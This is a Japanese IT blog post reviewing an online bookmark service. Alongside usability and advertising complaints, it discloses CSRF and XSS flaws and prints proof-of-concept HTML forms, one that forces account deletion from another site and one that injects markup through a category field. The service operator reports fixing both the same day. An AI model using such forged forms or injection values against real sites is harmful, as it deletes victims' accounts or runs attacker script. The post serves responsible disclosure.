Web、サーバ、ソフトウェア、バグ・脆弱性 などの情報を何人かで集まって書いていく IT/Web情報系ブログ

オンラインのブックマークサービス、ぶっくま!を触ってみた感想

投稿日:   最終更新日:2017/01/15  投稿者:nk.

こんな辺境のブログにもサービスの紹介をしてくださいとメールしてくれる人もいて、非常にありがたいことです。
このブログでもすでに何度かほかのサービスの紹介(という名の様々な検証)をしてきましたが、今回また新たにメールが届きました。

それは、シンプルなオンラインのブックマークサービスという触れ込みの、ぶっくま!です。
せっかくなので様々な角度から検証してみたいと思います。
既にほかのサイトでも紹介されているようですが、先入観を持たぬようそれらの情報は一切参照せずに書きます。

よい点

複数ブラウザでのブックマークの共有

すでにChromeやFirefoxなどの多くのブラウザで複数端末間のブックマーク共有は実装されていますが、複数のブラウザ間でブックマークを共有する機能は今のところ知りません。
PCではChromeを使っているけれどiPhoneでSafariを使っているといった場合、ブックマークの共有が手間であることが考えられます。
そういった難点をこのぶっくま!でカバーできると思います。
このサービスを使わずともGoogleのスプレッドシートなどで管理することも可能ですが、それよりかは楽でしょうし見栄えもよいでしょう。

一覧表示のみやすさ

多くのブラウザではブックマークが縦にずらずらと配置され、登録数が多くなるとスクロールをしまくることになります。ぶっくま!では横にも並べることで目視で探しやすくなっているように感じられます。

スポンサーリンク

わるい点

広告の配置

初期登録数に対して、広告が大きすぎるように思えました。

HTTPSではない

ID/PWD/メアドを送信する必要性があるのにHTTPSではなく生のHTTPであることには不安を覚えます。

CSRF対策がされていない

トラップとなるページから強制的にクエリを踏ませるCSRFという攻撃がありますが、それへの対策がされていません。外部サイトから退会させられることが可能です。自分で試して確認済みです。
もちろん、退会といった重要な場面だけでなく全体にCSRF対策が組み込まれる必要があると思います。

ぶっくま!では、デフォルトで登録済みのYahoo! Japanなどをそのまま残してユーザが利用することを想定していると思います。このことは、デフォルトで登録されているamazon.co.jpにアフィリエイトコードが埋め込まれていることからも推測されます。
そのような場合、デフォルトの登録サイトのサイト名はデフォルトのものを指定したうえでサイトアドレスだけ任意のURLに変えてしまうということが可能になってしまいます。これは危険ではないでしょうか。

2016年02月07日 追記
即日対策取られたみたいです。
XSSとCSRFの脆弱性への対応 [ぶっくま!]

XSSの脆弱性

CSRFの脆弱性と同時に、XSSの脆弱性が見つかりました。
これは結構ヤバいです。任意のJavaScriptコードが実行できてしまいます。
Chromeではブラウザ側が危険コードの実行を阻止してくれますが、Firefoxでは見事にコードが実行されてしまいました。
bukkumaXSSinFx

CSRFとXSSに関するテストコードを公開するので、ぶっくま!の中の人は早急に対策してくださいね。

2016年02月07日 追記
即日対策取られたみたいですが、テストコードは引き続き掲載します。
XSSとCSRFの脆弱性への対応 [ぶっくま!]

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
			<form action="http://www.bukkumaweb.com/user.php" method="post" lang="ja">
				<h1>退会のCSRF</h1>
				<input name="delete" type="submit" class="btn" value="ぶっくま! から退会する">
				<input name="mode" type="hidden" value="delete">
			</form>
<br>
<br>

		<form action="http://www.bukkumaweb.com/user.php" method="post" lang="ja">
			<h1>XSS</h1>
			<input name="category" type="text" value="&quot;&gt;&lt;s&gt;aaaaa&lt;/s&gt;&lt;b class=&quot;">
			<input name="admin" type="submit" class="menu" value="ブックマークの編集">
			<input name="mode" type="hidden" value="linklist">
			<input name="cat_no" type="hidden" value="1">
		</form>
</body>
</html>

ktm@sの感想

別で1記事書くほどじゃないのでこっちに乗っかる。

よくぞまあうちみたいな記事も少ないブログを見つけてメールしてくれました。
nk.も書いてたけど大変ありがたいことです。

うちは紹介してくれと言われたらちゃんと紹介をする。
記事を読む人のために書くので、ロクに中身も見ずに褒めちぎるなんて事はしない。

なので別に悪意があったり叩こうとしてるわけじゃなく、悪いと思ったところも書く。
褒めちぎって欲しい人はいくらか包んでくれ。

良かったところ

登録

登録に対して手間を感じないのは良かった。
メールアドレス必要だけどメール確認がないのでストレスがなかった。

悪かったところ

nk.が上げている脆弱性は除く。

UI関連

ブックマークの登録/追加・編集の作り方と、グループの編集リンクの作り方があってなくてグループ追加どこからするのか探した。
直感的にいけるようで直感的じゃないなあと。

加えて、何かを編集する際に必要とされるクリック数が多すぎ。
開いて開いて変更して保存して戻るとか耐えられなかった。

グループ名の編集なんかもメインの画面でグループ名をクリックしたらそのまま変えられないとだるい。
とにかく目的を達するまでの操作が多すぎ。ばらけすぎ。

広告

論外。初期画面の60%くらいが広告で埋まっているとか異常。
見栄えもよろしくない。
せめてヨメレバ・カエレバのようなサービスを使って商品絞ってピンポイントで紹介するなどして欲しい。
あるいは本当に邪魔にならないレベルのGoogleAds。

ブックマークの使い勝手

そもそもの機能が使い勝手が悪い。

例えば普通にブラウザのブックマーク使ってたらまずジャンルでフォルダわけされてると思うが、その中に子カテゴリ的にフォルダを作って細分化してる場合がほとんどだと思う。
例えばウェブ製作とかでもhtmlだcssだphpだで細かくわかれる。

ジャンル自体はグループを追加すればよいが、1カテゴリでも多種多様になるだろうブックマークを視覚的に関連付けるための子カテゴリ機能が無いのは個人的に致命的だった。

子カテゴリ的に中で何階層かフォルダわけがあり、さらに中身もD&Dで場所を自由に移動できたりURLやタイトルでソートできないと万人に使われるためのツールとしてはスタートラインに立っていないとさえ思う。

レスポンシブにしておくれ

PCとモバイル端末でURLが違うのは何が意味があるのか。

あとがき

個人的には絶対にオススメしない。

自分で便利なものは自分が一番良くわかってるのだから自作すればよい。
手間がかかるだとか出来ないだとかでも、このサービスはファーストチョイスにならない。

2016/02/07 追記
XSSやCSRF脆弱性は即日対応されたようで諸々の対応が早い。信頼できる管理者のように思える。
現状、個人的には機能面の物足りなさでファーストチョイスにならない事に変わりはないが、機能面の方も改善を期待してもいいものだと思う。
利便性の向上に期待したい。

- ウェブの脆弱性, 検証

Comment

  1. ぶっくま! より:

    脆弱性については、対応しました!
    ご指摘ありがとうございました!

    http://webss.blog.so-net.ne.jp/2016-02-07

    • nk. nk. より:

      ぶっくま!さん

      修正お疲れさまでした。
      修正されたかの確認はしていませんが、攻撃用コードを公開してたので該当箇所は特定されてるでしょうし、大丈夫だと信じてます。
      お察しの通りほかにもいろいろ確認はしてたのですが、なんせソースコードが手元にない状態なので完璧に確認できてるとは言えない点はご了承ください。
      また、素早い対応で安心しました。どことは言いませんが脆弱性があるよと教えてもガン無視してきたり挙句アクセス制限してくるようなところもあるので。
      この記事を書いたときには気づかなかったのですが、ログイン中だとindex.phpにあるコンテンツ(「このサイトについて」等)が参照できないのはやや不便に感じましたので、ご参考までに。

  2. ぶっくま! より:

    nk. さん

    > ログイン中だとindex.phpにあるコンテンツ(「このサイトについて」等)が参照できないのはやや不便に感じました

    そうですね。
    なにか方法を考えてみます!

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

関連記事